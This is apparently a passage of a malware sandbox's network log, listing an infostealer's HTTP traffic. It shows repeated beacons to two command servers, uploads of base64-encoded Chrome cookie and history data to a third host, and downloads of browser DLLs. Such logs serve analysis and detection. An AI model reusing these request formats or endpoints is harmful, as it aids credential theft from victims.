r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEHost: 65.21.175.0Content-Length: 543Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 61 58 42 73 62 32 64 6e 5a 58 49 75 59 32 38 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 55 77 4f 54 6b 31 4e 54 6b 77 43 54 55 30 4e 44 6b 7a 4e 7a 6b 33 4d 54 4d 33 4d 6a 59 7a 4f 54 41 31 43 54 49 4b 61 58 42 73 62 32 64 6e 5a 58 49 75 59 32 38 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 55 77 4f 54 6b 31 4e 54 6b 77 43 57 4e 73 61 47 59 77 4d 7a 41 79 4f 47 70 68 43 54 67 75 4e 44 59 75 4d 54 49 7a 4c 6a 4d 7a 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 2d 2d 0d 0a Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="file"aXBsb2dnZXIuY28JRkFMU0UJLwlGQUxTRQkxNzUwOTk1NTkwCTU0NDkzNzk3MTM3MjYzOTA1CTIKaXBsb2dnZXIuY28JRkFMU0UJLwlGQUxTRQkxNzUwOTk1NTkwCWNsaGYwMzAyOGphCTguNDYuMTIzLjMzCg==------DBKKFHIEGDHJKECAAKKE--
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKFHost: 65.21.175.0Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 61 47 6c 7a 64 47 39 79 65 56 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 61 48 52 30 63 48 4d 36 4c 79 39 70 63 47 78 76 5a 32 64 6c 63 69 35 6a 62 79 38 78 62 45 78 31 59 67 6f 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 2d 2d 0d 0a Data Ascii: ------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EBGDAAKJJDAAKFHJKJKFContent-Disposition: form-data; name="file"aHR0cHM6Ly9pcGxvZ2dlci5jby8xbEx1Ygo=------EBGDAAKJJDAAKFHJKJKF--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKEHost: 65.21.175.0Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 2d 2d 0d 0a Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="file"------GCAFCAFHJJDBFIECFBKE--
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAECHost: 65.21.175.0Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 45 43 2d 2d 0d 0a Data Ascii: ------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KEGDAKEHJDHIDHJJDAECContent-Disposition: form-data; name="file"------KEGDAKEHJDHIDHJJDAEC--
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/freebl3.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/mozglue.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/msvcp140.dll HTTP/1.1Host: 65.21.175.0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Mb3GvQs8/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.172.128.116Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
